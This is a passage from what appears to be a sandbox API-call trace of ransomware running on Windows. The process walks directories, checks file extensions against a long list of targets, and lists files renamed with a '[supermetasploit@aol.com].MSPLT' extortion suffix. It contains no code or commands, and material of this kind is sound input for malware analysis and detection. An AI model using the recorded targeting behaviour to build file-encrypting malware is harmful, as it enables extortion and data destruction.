(lpString1=".indd", lpString2="MSPLT") returned -1 [0284.033] lstrlenW (lpString=".ini") returned 4 [0284.033] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".iqy") returned 4 [0284.033] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0284.033] lstrlenW (lpString=".j2c") returned 4 [0284.034] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".j2k") returned 4 [0284.034] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".java") returned 5 [0284.034] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0284.034] lstrlenW (lpString=".jp2") returned 4 [0284.034] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".jpc") returned 4 [0284.034] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".jpe") returned 4 [0284.034] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".jpeg") returned 5 [0284.034] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0284.034] lstrlenW (lpString=".jpf") returned 4 [0284.034] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".jpg") returned 4 [0284.034] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".jpx") returned 4 [0284.034] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".js") returned 3 [0284.034] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0284.034] lstrlenW (lpString=".jsf") returned 4 [0284.034] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".json") returned 5 [0284.034] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0284.034] lstrlenW (lpString=".jsp") returned 4 [0284.034] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0284.034] lstrlenW (lpString=".kdc") returned 4 [0284.034] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".kmz") returned 4 [0284.035] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".kwm") returned 4 [0284.035] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".lasso") returned 6 [0284.035] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0284.035] lstrlenW (lpString=".lbi") returned 4 [0284.035] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".lgf") returned 4 [0284.035] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".lgp") returned 4 [0284.035] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".log") returned 4 [0284.035] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".m1v") returned 4 [0284.035] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".m4a") returned 4 [0284.035] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".m4v") returned 4 [0284.035] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".max") returned 4 [0284.035] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".md") returned 3 [0284.035] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0284.035] lstrlenW (lpString=".mda") returned 4 [0284.035] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0284.035] lstrlenW (lpString=".mdb") returned 4 [0284.035] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mde") returned 4 [0284.036] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mdf") returned 4 [0284.036] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mdw") returned 4 [0284.036] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mef") returned 4 [0284.036] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mft") returned 4 [0284.036] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mfw") returned 4 [0284.036] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mht") returned 4 [0284.036] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mhtml") returned 6 [0284.036] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0284.036] lstrlenW (lpString=".mka") returned 4 [0284.036] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mkidx") returned 6 [0284.036] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0284.036] lstrlenW (lpString=".mkv") returned 4 [0284.036] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mos") returned 4 [0284.036] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mov") returned 4 [0284.036] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0284.036] lstrlenW (lpString=".mp3") returned 4 [0284.037] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".mp4") returned 4 [0284.037] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".mpeg") returned 5 [0284.037] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0284.037] lstrlenW (lpString=".mpg") returned 4 [0284.037] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".mpv") returned 4 [0284.037] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".mrw") returned 4 [0284.037] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".msg") returned 4 [0284.037] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".mxl") returned 4 [0284.037] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".myd") returned 4 [0284.037] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".myi") returned 4 [0284.037] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".nef") returned 4 [0284.037] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0284.037] lstrlenW (lpString=".nrw") returned 4 [0284.209] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0284.209] lstrlenW (lpString=".obj") returned 4 [0284.210] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0284.210] lstrlenW (lpString=".odb") returned 4 [0284.210] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0284.210] lstrlenW (lpString=".odc") returned 4 [0284.210] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0284.210] lstrlenW (lpString=".odm") returned 4 [0284.210] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0284.210] lstrlenW (lpString=".odp") returned 4 [0284.210] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0284.210] lstrlenW (lpString=".ods") returned 4 [0284.210] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0284.210] lstrlenW (lpString=".oft") returned 4 [0284.210] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0284.210] lstrlenW (lpString=".one") returned 4 [0284.210] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0284.210] lstrlenW (lpString=".onepkg") returned 7 [0284.210] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0284.210] lstrlenW (lpString=".onetoc2") returned 8 [0284.210] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0284.210] lstrlenW (lpString=".opt") returned 4 [0284.210] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0284.210] lstrlenW (lpString=".oqy") returned 4 [0284.210] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".orf") returned 4 [0284.211] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".p12") returned 4 [0284.211] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".p7b") returned 4 [0284.211] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".p7c") returned 4 [0284.211] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".pam") returned 4 [0284.211] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".pbm") returned 4 [0284.211] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".pct") returned 4 [0284.211] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".pcx") returned 4 [0284.211] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".pdd") returned 4 [0284.211] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".pdf") returned 4 [0284.211] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".pdp") returned 4 [0284.211] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0284.211] lstrlenW (lpString=".pef") returned 4 [0284.211] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0284.212] lstrlenW (lpString=".pem") returned 4 [0284.212] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0284.212] lstrlenW (lpString=".pff") returned 4 [0284.212] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0284.212] lstrlenW (lpString=".pfm") returned 4 [0284.212] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0284.212] lstrlenW (lpString=".pfx") returned 4 [0284.212] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0284.212] lstrlenW (lpString=".pgm") returned 4 [0284.212] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0284.212] lstrlenW (lpString=".php") returned 4 [0284.212] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0284.212] lstrlenW (lpString=".php3") returned 5 [0284.212] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0284.212] lstrlenW (lpString=".php4") returned 5 [0284.212] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0284.212] lstrlenW (lpString=".php5") returned 5 [0284.212] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0284.212] lstrlenW (lpString=".phtml") returned 6 [0284.212] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0284.213] lstrlenW (lpString=".pict") returned 5 [0284.213] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0284.213] lstrlenW (lpString=".pl") returned 3 [0284.213] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0284.213] lstrlenW (lpString=".pls") returned 4 [0284.213] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0284.213] lstrlenW (lpString=".pm") returned 3 [0284.213] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0284.213] lstrlenW (lpString=".png") returned 4 [0284.213] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0284.213] lstrlenW (lpString=".pnm") returned 4 [0284.213] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0284.213] lstrlenW (lpString=".pot") returned 4 [0284.213] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0284.213] lstrlenW (lpString=".potm") returned 5 [0284.213] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0284.213] lstrlenW (lpString=".potx") returned 5 [0284.213] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0284.213] lstrlenW (lpString=".ppa") returned 4 [0284.214] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0284.214] lstrlenW (lpString=".ppam") returned 5 [0284.214] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0284.214] lstrlenW (lpString=".ppm") returned 4 [0284.214] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0284.214] lstrlenW (lpString=".pps") returned 4 [0284.214] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0284.214] lstrlenW (lpString=".ppsm") returned 5 [0284.214] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0284.214] lstrlenW (lpString=".ppt") returned 4 [0284.214] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0284.214] lstrlenW (lpString=".pptm") returned 5 [0284.214] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0284.214] lstrlenW (lpString=".pptx") returned 5 [0284.214] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0284.214] lstrlenW (lpString=".prn") returned 4 [0284.214] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0284.214] lstrlenW (lpString=".ps") returned 3 [0284.215] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0284.215] lstrlenW (lpString=".psb") returned 4 [0284.215] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0284.215] lstrlenW (lpString=".psd") returned 4 [0284.215] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0284.215] lstrlenW (lpString=".pst") returned 4 [0284.215] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0284.215] lstrlenW (lpString=".ptx") returned 4 [0284.215] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0284.215] lstrlenW (lpString=".pub") returned 4 [0284.215] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0284.215] lstrlenW (lpString=".pwm") returned 4 [0284.215] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0284.215] lstrlenW (lpString=".pxr") returned 4 [0284.215] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0284.215] lstrlenW (lpString=".py") returned 3 [0284.215] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0284.215] lstrlenW (lpString=".qt") returned 3 [0284.215] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0284.215] lstrlenW (lpString=".r3d") returned 4 [0284.215] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0284.215] lstrlenW (lpString=".raf") returned 4 [0284.216] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0284.216] lstrlenW (lpString=".rar") returned 4 [0284.216] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0284.216] lstrlenW (lpString=".raw") returned 4 [0284.216] lstrcmpiW (lpString1=".raw", lpString2="SPLT") returned -1 [0284.216] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b3624c8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b3624c8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b4dfc14, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13816, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.216] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba81119, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba81119, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bde93fa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.216] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba81119, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba81119, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bde93fa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.216] FindClose (in: hFindFile=0x3948328 | out: hFindFile=0x3948328) returned 1 [0284.218] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.218] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b578531, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b578531, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1044", cAlternateFileName="")) returned 1 [0284.218] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.218] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b578531, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b578531, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0284.220] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b578531, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b578531, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.220] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b3fc3a2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b3fc3a2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b55240a, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xcd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.220] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b55240a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b55240a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b578531, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x136c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.220] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba0974a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba0974a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bac8a6e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.220] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba0974a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba0974a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bac8a6e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.221] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0284.222] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.223] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1045", cAlternateFileName="")) returned 1 [0284.223] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.223] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0284.224] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.224] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b65e7a1, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b65e7a1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b89975c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x10b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.225] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b68346a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b68346a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b89975c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x142c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.225] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba2fb18, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba2fb18, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5baee50d, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.225] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba2fb18, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba2fb18, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5baee50d, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.225] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0284.226] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.226] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1046", cAlternateFileName="")) returned 1 [0284.227] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.227] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, 